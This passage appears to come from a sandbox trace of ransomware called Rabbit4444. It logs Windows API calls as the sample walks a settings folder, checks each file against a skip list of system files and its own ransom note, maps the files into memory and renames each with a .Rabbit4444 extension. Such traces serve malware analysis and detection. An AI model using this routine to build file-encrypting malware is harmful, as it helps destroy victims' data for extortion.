lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_color_enabletransparency.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.845] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33b03eb0, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x33b03eb0, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x504, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms", cAlternateFileName="AA6C9E~1.SET")) returned 1 [0057.845] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.845] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.845] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.845] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms", lpString2=".") returned 1 [0057.845] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms", lpString2="..") returned 1 [0057.845] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms", lpString2="windows") returned -1 [0057.845] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.845] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.845] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms", lpString2="boot") returned -1 [0057.845] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.845] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.845] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms") returned="AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms" [0057.845] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.846] lstrlenW (lpString="AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms") returned 68 [0057.846] lstrlenW (lpString="Rabbit4444") returned 10 [0057.846] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.846] lstrlenW (lpString=".dll") returned 4 [0057.846] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.846] lstrlenW (lpString=".lnk") returned 4 [0057.846] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.846] lstrlenW (lpString=".ini") returned 4 [0057.846] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.846] lstrlenW (lpString=".sys") returned 4 [0057.846] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.846] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_lockscreenappsbadge.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.846] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.846] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14915701759) returned 1 [0057.846] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1284) returned 1 [0057.846] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0057.846] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0057.846] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x298 [0057.848] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x70000 [0057.848] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.848] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0057.848] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.848] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0057.848] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.849] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0057.849] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.849] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0057.849] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14915957138) returned 1 [0057.849] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0057.849] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0057.849] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.849] CloseHandle (hObject=0x298) returned 1 [0057.849] CloseHandle (hObject=0x278) returned 1 [0057.849] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms.Rabbit4444") returned 196 [0057.849] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_lockscreenappsbadge.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenAppsBadge.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_lockscreenappsbadge.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.850] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x344d9a77, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x344d9a77, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms", cAlternateFileName="AAD1E2~1.SET")) returned 1 [0057.850] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.850] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.850] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.850] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms", lpString2=".") returned 1 [0057.850] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms", lpString2="..") returned 1 [0057.850] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms", lpString2="windows") returned -1 [0057.850] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.850] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.850] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms", lpString2="boot") returned -1 [0057.850] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.850] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.850] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms") returned="AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms" [0057.850] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.851] lstrlenW (lpString="AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms") returned 67 [0057.851] lstrlenW (lpString="Rabbit4444") returned 10 [0057.851] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.851] lstrlenW (lpString=".dll") returned 4 [0057.851] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.851] lstrlenW (lpString=".lnk") returned 4 [0057.851] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.851] lstrlenW (lpString=".ini") returned 4 [0057.851] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.851] lstrlenW (lpString=".sys") returned 4 [0057.851] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.851] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_lockscreenappstile.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.851] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.851] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14916199239) returned 1 [0057.851] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1279) returned 1 [0057.851] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0057.851] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0057.851] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x298 [0057.852] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x70000 [0057.853] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.853] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0057.853] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.853] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0057.853] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.854] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0057.854] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.854] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0057.854] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14916443779) returned 1 [0057.854] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0057.854] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0057.854] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.854] CloseHandle (hObject=0x298) returned 1 [0057.854] CloseHandle (hObject=0x278) returned 1 [0057.854] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms.Rabbit4444") returned 195 [0057.854] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_lockscreenappstile.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenAppsTile.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_lockscreenappstile.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.855] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3460ad4a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3460ad4a, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x238d127e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x519, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms", cAlternateFileName="AA5259~1.SET")) returned 1 [0057.855] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.855] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.855] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.855] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms", lpString2=".") returned 1 [0057.855] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms", lpString2="..") returned 1 [0057.855] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms", lpString2="windows") returned -1 [0057.855] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.855] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.855] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms", lpString2="boot") returned -1 [0057.855] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.855] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.855] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms") returned="AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms" [0057.855] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.856] lstrlenW (lpString="AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms") returned 69 [0057.856] lstrlenW (lpString="Rabbit4444") returned 10 [0057.856] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.856] lstrlenW (lpString=".dll") returned 4 [0057.856] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.856] lstrlenW (lpString=".lnk") returned 4 [0057.856] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.856] lstrlenW (lpString=".ini") returned 4 [0057.856] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.856] lstrlenW (lpString=".sys") returned 4 [0057.856] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.856] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_lockscreenbackground.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.856] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.856] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14916704200) returned 1 [0057.856] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1305) returned 1 [0057.856] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0057.856] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0057.856] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0057.858] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0057.858] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.859] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0057.859] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.859] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0057.859] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.859] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0057.859] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.859] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0057.859] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14917075624) returned 1 [0057.860] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0057.860] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0057.860] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.860] CloseHandle (hObject=0x298) returned 1 [0057.860] CloseHandle (hObject=0x278) returned 1 [0057.860] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms.Rabbit4444") returned 197 [0057.860] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_lockscreenbackground.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenBackground.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_lockscreenbackground.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.861] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3473c021, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3473c021, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2339a047, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x54b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms", cAlternateFileName="AA2361~2.SET")) returned 1 [0057.861] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.861] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.861] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.861] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms", lpString2=".") returned 1 [0057.861] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms", lpString2="..") returned 1 [0057.861] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms", lpString2="windows") returned -1 [0057.862] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.862] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.862] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms", lpString2="boot") returned -1 [0057.862] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.862] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.862] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms") returned="AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms" [0057.862] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.862] lstrlenW (lpString="AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms") returned 79 [0057.862] lstrlenW (lpString="Rabbit4444") returned 10 [0057.862] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.862] lstrlenW (lpString=".dll") returned 4 [0057.862] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.862] lstrlenW (lpString=".lnk") returned 4 [0057.862] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.862] lstrlenW (lpString=".ini") returned 4 [0057.862] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.862] lstrlenW (lpString=".sys") returned 4 [0057.863] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.863] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_lockscreenchoosebackgroundtype.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 